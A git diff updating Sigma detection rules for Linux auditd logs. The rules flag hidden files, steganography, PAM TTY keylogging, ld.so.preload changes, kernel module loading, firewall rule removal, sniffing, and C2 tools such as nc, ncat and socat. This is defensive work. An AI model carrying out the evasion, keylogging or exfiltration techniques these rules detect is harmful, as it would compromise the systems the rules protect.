d08722cd-3d09-449a-80b4-83ea2d9d4616 +status: test description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md author: 'Pawel Mazur' -status: experimental date: 2021/09/06 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md - - https://attack.mitre.org/techniques/T1564/001/ +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1564.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - commands: - type: EXECVE - a0: - - mkdir - - touch - - vim - - nano - - vi - arguments: - - a1|contains: '/.' - - a1|startswith: '.' - - a2|contains: '/.' - - a2|startswith: '.' - condition: commands and arguments -tags: - - attack.defense_evasion - - attack.t1564.001 + commands: + type: EXECVE + a0: + - mkdir + - touch + - vim + - nano + - vi + arguments: + - a1|contains: '/.' + - a1|startswith: '.' + - a2|contains: '/.' + - a2|startswith: '.' + condition: commands and arguments falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml index 673a4608f..584fbe363 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml @@ -1,29 +1,29 @@ title: Steganography Hide Zip Information in Picture File id: 45810b50-7edc-42ca-813b-bdac02fb946b +status: test description: Detects appending of zip file to image +references: + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ author: 'Pawel Mazur' -status: experimental date: 2021/09/09 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - commands: - type: EXECVE - a0: cat - a1: - a1|endswith: - - '.jpg' - - '.png' - a2: - a2|endswith: '.zip' - condition: commands and a1 and a2 + commands: + type: EXECVE + a0: cat + a1: + a1|endswith: + - '.jpg' + - '.png' + a2: + a2|endswith: '.zip' + condition: commands and a1 and a2 +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml index 4cd280f36..fdf651281 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml @@ -1,35 +1,33 @@ title: Linux Keylogging with Pam.d id: 49aae26c-450e-448b-911d-b3c13d178dfc +status: test description: Detect attempt to enable auditing of TTY input - # -w /etc/pam.d/ -p wa -k pam - this rule will help you detect changes to the pam.d files- https://github.com/Neo23x0/auditd/blob/master/audit.rules - # - the TTY events detection asumes that you do not expect them in your environment or add filtering on those users that you configured it for +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md + - https://linux.die.net/man/8/pam_tty_audit + - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing + - https://access.redhat.com/articles/4409591#audit-record-types-2 author: 'Pawel Mazur' -status: experimental date: 2021/05/24 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md - - https://attack.mitre.org/techniques/T1003/ - - https://linux.die.net/man/8/pam_tty_audit - - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing - - https://access.redhat.com/articles/4409591#audit-record-types-2 +modified: 2022/12/18 +tags: + - attack.credential_access + - attack.t1003 + - attack.t1056.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - path_events: - type: PATH - name: - - '/etc/pam.d/system-auth' - - '/etc/pam.d/password-auth' - tty_events: + selection_path_events: + type: PATH + name: + - '/etc/pam.d/system-auth' + - '/etc/pam.d/password-auth' + selection_tty_events: type: - - 'TTY' - - 'USER_TTY' - condition: path_events or tty_events -tags: - - attack.credential_access - - attack.t1003 - - attack.t1056.001 + - 'TTY' + - 'USER_TTY' + condition: 1 of selection_* falsepositives: - - Administrative work + - Administrative work level: high diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml index ffe1bd020..742164d49 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml @@ -2,23 +2,23 @@ title: Modification of ld.so.preload id: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 status: test description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. -author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md - - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md + - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html +author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community date: 2019/10/24 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1574.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'PATH' - name: '/etc/ld.so.preload' - condition: selection + selection: + type: 'PATH' + name: '/etc/ld.so.preload' + condition: selection falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.defense_evasion - - attack.t1574.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml index 941c1ad1d..108f57e50 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml @@ -1,14 +1,21 @@ title: Loading of Kernel Module via Insmod id: 106d7cbd-80ff-4985-b682-a7043e5acb72 -status: experimental -description: Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. -author: 'Pawel Mazur' -date: 2021/11/02 +status: test +description: | + Detects loading of kernel modules with insmod command. + Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. + Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. references: - - https://attack.mitre.org/techniques/T1547/006/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md - https://linux.die.net/man/8/insmod - https://man7.org/linux/man-pages/man8/kmod.8.html +author: 'Pawel Mazur' +date: 2021/11/02 +modified: 2022/12/25 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1547.006 logsource: product: linux service: auditd @@ -21,7 +28,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.persistence - - attack.privilege_escalation - - attack.t1547.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml index 028aac4f9..db00c3f22 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml @@ -2,29 +2,29 @@ title: Logging Configuration Changes on Linux Host id: c830f15d-6f6e-430f-8074-6f73d6807841 status: test description: Detect changes of syslog daemons configuration files -author: Mikhail Larin, oscd.community references: - - self experience + - self experience +author: Mikhail Larin, oscd.community date: 2019/10/25 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1562.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'PATH' - name: - - /etc/syslog.conf - - /etc/rsyslog.conf - - /etc/syslog-ng/syslog-ng.conf - condition: selection + selection: + type: 'PATH' + name: + - /etc/syslog.conf + - /etc/rsyslog.conf + - /etc/syslog-ng/syslog-ng.conf + condition: selection fields: - - exe - - comm - - key + - exe + - comm + - key falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: high -tags: - - attack.defense_evasion - - attack.t1562.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml index ce000f173..253fa5aa5 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml @@ -1,24 +1,25 @@ title: Masquerading as Linux Crond Process id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 status: test -description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. -author: Timur Zinniatullin, oscd.community +description: | + Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. + Several different variations of this technique have been observed. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process +author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/11/27 +modified: 2023/08/22 +tags: + - attack.defense_evasion + - attack.t1036.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'execve' - a0: 'cp' - a1: '-i' - a2: '/bin/sh' - a3|endswith: '/crond' - condition: selection + selection: + type: 'execve' + a0: 'cp' + a1: '/bin/sh' + a2|endswith: '/crond' + condition: selection level: medium -tags: - - attack.defense_evasion - - attack.t1036.003 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml new file mode 100644 index 000000000..3a042511c --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml @@ -0,0 +1,37 @@ +title: Modify System Firewall +id: 323ff3f5-0013-4847-bbd4-250b5edb62cc +related: + - id: 53059bc0-1472-438b-956a-7508a94a91f0 + type: similar +status: test +description: | + Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. + Detection rules that match only on the disabling of firewalls will miss this. +references: + - https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html + - https://blog.aquasec.com/container-security-tnt-container-attack +author: IAI +date: 2023/03/06 +tags: + - attack.t1562.004 + - attack.defense_evasion +logsource: + product: linux + service: auditd +detection: + selection1: + type: 'EXECVE' + a0: 'iptables' + a1|contains: 'DROP' + selection2: + type: 'EXECVE' + a0: 'firewall-cmd' + a1|contains: 'remove' + selection3: + type: 'EXECVE' + a0: 'ufw' + a1|contains: 'delete' + condition: 1 of selection* +falsepositives: + - Legitimate admin activity +level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml index ff1e827e6..9606fc5ae 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml @@ -1,32 +1,34 @@ -title: Linux Network Service Scanning +title: Linux Network Service Scanning - Auditd id: 3761e026-f259-44e6-8826-719ed8079408 related: - id: 3e102cd9-a70d-4a7a-9508-403963092f31 type: derived -status: experimental +status: test description: Detects enumeration of local or remote network services. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md author: Alejandro Ortuno, oscd.community date: 2020/10/21 -modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md +modified: 2023/09/26 tags: - - attack.discovery - - attack.t1046 + - attack.discovery + - attack.t1046 logsource: - product: linux - service: auditd - definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/master/audit.rules#L182-L183' + product: linux + service: auditd + definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183' detection: - selection: - type: 'SYSCALL' - exe|endswith: - - '/telnet' - - '/nmap' - - '/netcat' - - '/nc' - key: 'network_connect_4' - condition: selection + selection: + type: 'SYSCALL' + exe|endswith: + - '/telnet' + - '/nmap' + - '/netcat' + - '/nc' + - '/ncat' + - '/nc.openbsd' + key: 'network_connect_4' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml index 85be63038..f0b51e629 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml @@ -1,31 +1,33 @@ -title: Network Sniffing +title: Network Sniffing - Linux id: f4d3748a-65d1-4806-bd23-e25728081d01 status: test -description: Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. -author: Timur Zinniatullin, oscd.community +description: | + Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. + An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md +author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/11/27 +modified: 2022/12/18 +tags: + - attack.credential_access + - attack.discovery + - attack.t1040 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection1: - type: 'execve' - a0: 'tcpdump' - a1: '-c' - a3|contains: '-i' - selection2: - type: 'execve' - a0: 'tshark' - a1: '-c' - a3: '-i' - condition: selection1 or selection2 + selection_1: + type: 'execve' + a0: 'tcpdump' + a1: '-c' + a3|contains: '-i' + selection_2: + type: 'execve' + a0: 'tshark' + a1: '-c' + a3: '-i' + condition: 1 of selection_* falsepositives: - - Legitimate administrator or user uses network sniffing tool for legitimate reasons. + - Legitimate administrator or user uses network sniffing tool for legitimate reasons. level: low -tags: - - attack.credential_access - - attack.discovery - - attack.t1040 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml index 29fe14e15..c899ed623 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -1,10 +1,16 @@ -title: OMIGOD SCX RunAsProvider ExecuteShellCommand +title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd id: 045b5f9c-49f7-4419-a236-9854fb3c827a -description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -status: experimental -date: 2021/09/17 -modified: 2021/11/11 +status: test +description: | + Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. + SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. + Microsoft Azure, and Microsoft Operations Management Suite. +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +date: 2021/09/17 +modified: 2022/11/26 tags: - attack.privilege_escalation - attack.initial_access @@ -12,9 +18,6 @@ tags: - attack.t1068 - attack.t1190 - attack.t1203 -references: - - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - - https://github.com/Azure/Azure-Sentinel/pull/3059 logsource: product: linux service: auditd @@ -22,7 +25,7 @@ detection: selection: type: 'SYSCALL' syscall: 'execve' - uid: '0' + uid: 0 cwd: '/var/opt/microsoft/scx/tmp' comm: 'sh' condition: selection diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml index e017b7d48..a167a859d 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml @@ -2,42 +2,41 @@ title: Password Policy Discovery id: ca94a6db-8106-4737-9ed2-3e3bb826af0a status: stable description: Detects password policy discovery commands -author: Ömer Günal, oscd.community, Pawel Mazur -date: 2020/10/08 -modified: 2021/11/12 references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md - - https://attack.mitre.org/techniques/T1201/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md - https://linux.die.net/man/1/chage - https://man7.org/linux/man-pages/man1/passwd.1.html - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu +author: Ömer Günal, oscd.community, Pawel Mazur +date: 2020/10/08 +modified: 2022/12/18 +tags: + - attack.discovery + - attack.t1201 logsource: product: linux service: auditd detection: - files: - type: 'PATH' - name: - - '/etc/pam.d/common-password' - - '/etc/security/pwquality.conf' - - '/etc/pam.d/system-auth' - - '/etc/login.defs' - chage: - type: 'EXECVE' - a0: 'chage' - a1: - - '--list' - - '-l' - passwd: - type: 'EXECVE' - a0: 'passwd' - a1: - - '-S' - - '--status' - condition: files or chage or passwd + selection_files: + type: 'PATH' + name: + - '/etc/pam.d/common-password' + - '/etc/security/pwquality.conf' + - '/etc/pam.d/system-auth' + - '/etc/login.defs' + selection_chage: + type: 'EXECVE' + a0: 'chage' + a1: + - '--list' + - '-l' + selection_passwd: + type: 'EXECVE' + a0: 'passwd' + a1: + - '-S' + - '--status' + condition: 1 of selection_* falsepositives: - Legitimate administration activities level: low -tags: - - attack.discovery - - attack.t1201 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml index d7cc90375..1dbbda8d8 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml @@ -2,27 +2,26 @@ title: Systemd Service Reload or Start id: 2625cc59-0634-40d0-821e-cb67382a3dd7 status: test description: Detects a reload or a start of a service. -author: Jakob Weinzettl, oscd.community references: - - https://attack.mitre.org/techniques/T1543/002/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md +author: Jakob Weinzettl, oscd.community date: 2019/09/23 modified: 2021/11/27 +tags: + - attack.persistence + - attack.t1543.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0|contains: 'systemctl' - a1|contains: - - 'daemon-reload' - - 'start' - condition: selection + selection: + type: 'EXECVE' + a0|contains: 'systemctl' + a1|contains: + - 'daemon-reload' + - 'start' + condition: selection falsepositives: - - Installation of legitimate service. - - Legitimate reconfiguration of service. + - Installation of legitimate service. + - Legitimate reconfiguration of service. level: low -tags: - - attack.persistence - - attack.t1543.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml index 4b9b6c736..083ec68bb 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml @@ -1,37 +1,40 @@ title: Screen Capture with Import Tool id: dbe4b9c5-c254-4258-9688-d6af0b7967fd -description: Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed. +status: test +description: | + Detects adversary creating screen capture of a desktop with Import Tool. + Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. + ImageMagick must be installed. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md + - https://linux.die.net/man/1/import + - https://imagemagick.org/ author: 'Pawel Mazur' -status: experimental date: 2021/09/21 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md - - https://attack.mitre.org/techniques/T1113/ - - https://linux.die.net/man/1/import - - https://imagemagick.org/ +modified: 2022/10/09 +tags: + - attack.collection + - attack.t1113 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - import: - type: EXECVE - a0: import - import_window_root: - a1: '-window' - a2: 'root' - a3|endswith: - - '.png' - - '.jpg' - - '.jpeg' - import_no_window_root: - a1|endswith: - - '.png' - - '.jpg' - - '.jpeg' - condition: import and (import_window_root or import_no_window_root) -tags: - - attack.collection - - attack.t1113 + import: + type: EXECVE + a0: import + import_window_root: + a1: '-window' + a2: 'root' + a3|endswith: + - '.png' + - '.jpg' + - '.jpeg' + import_no_window_root: + a1|endswith: + - '.png' + - '.jpg' + - '.jpeg' + condition: import and (import_window_root or import_no_window_root) falsepositives: - - Legitimate use of screenshot utility + - Legitimate use of screenshot utility level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml index 0af916ba4..86ecd900b 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml @@ -1,31 +1,31 @@ title: Screen Capture with Xwd id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c +status: test description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture + - https://linux.die.net/man/1/xwd author: 'Pawel Mazur' -status: experimental date: 2021/09/13 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md - - https://attack.mitre.org/techniques/T1113/ - - https://linux.die.net/man/1/xwd +modified: 2022/12/18 +tags: + - attack.collection + - attack.t1113 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - xwd: - type: EXECVE - a0: xwd - xwd_root_window: - a1: '-root' - a2: '-out' - a3|endswith: '.xwd' - xwd_no_root_window: - a1: '-out' - a2|endswith: '.xwd' - condition: xwd and (xwd_root_window or xwd_no_root_window) -tags: - - attack.collection - - attack.t1113 + selection: + type: EXECVE + a0: xwd + xwd_root_window: + a1: '-root' + a2: '-out' + a3|endswith: '.xwd' + xwd_no_root_window: + a1: '-out' + a2|endswith: '.xwd' + condition: selection and 1 of xwd_* falsepositives: - - Legitimate use of screenshot utility + - Legitimate use of screenshot utility level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml index ef91d1ef2..0878a35b3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml @@ -1,23 +1,23 @@ -title: 'Split A File Into Pieces' +title: Split A File Into Pieces - Linux id: 2dad0cba-c62a-4a4f-949f-5f6ecd619769 status: test description: 'Detection use of the command "split" to split files into parts and possible transfer.' -author: 'Igor Fits, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2022/11/28 +tags: + - attack.exfiltration + - attack.t1030 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SYSCALL' - comm: 'split' - condition: selection + selection: + type: 'SYSCALL' + comm: 'split' + condition: selection falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: low -tags: - - attack.exfiltration - - attack.t1030 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml index cc4cd5189..6408e58e7 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml @@ -1,30 +1,30 @@ title: Steganography Hide Files with Steghide id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 -description: Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +status: test +description: Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +references: + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ author: 'Pawel Mazur' -status: experimental date: 2021/09/11 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: steghide - a1: embed - a2: - - '-cf' - - '-ef' - a4: - - '-cf' - - '-ef' - condition: selection + selection: + type: EXECVE + a0: steghide + a1: embed + a2: + - '-cf' + - '-ef' + a4: + - '-cf' + - '-ef' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml index 9dcd4df23..269f1c388 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml @@ -1,28 +1,28 @@ title: Steganography Extract Files with Steghide id: a5a827d9-1bbe-4952-9293-c59d897eb41b +status: test description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +references: + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ author: 'Pawel Mazur' -status: experimental date: 2021/09/11 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: steghide - a1: extract - a2: '-sf' - a3|endswith: - - '.jpg' - - '.png' - condition: selection + selection: + type: EXECVE + a0: steghide + a1: extract + a2: '-sf' + a3|endswith: + - '.jpg' + - '.png' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml index 7641995de..47b022810 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml @@ -1,21 +1,24 @@ title: Suspicious C2 Activities id: f7158a64-6204-4d6d-868a-6e6378b467e0 status: test -description: Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) -author: Marie Euler +description: | + Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. + This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. + These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) references: - - 'https://github.com/Neo23x0/auditd' + - 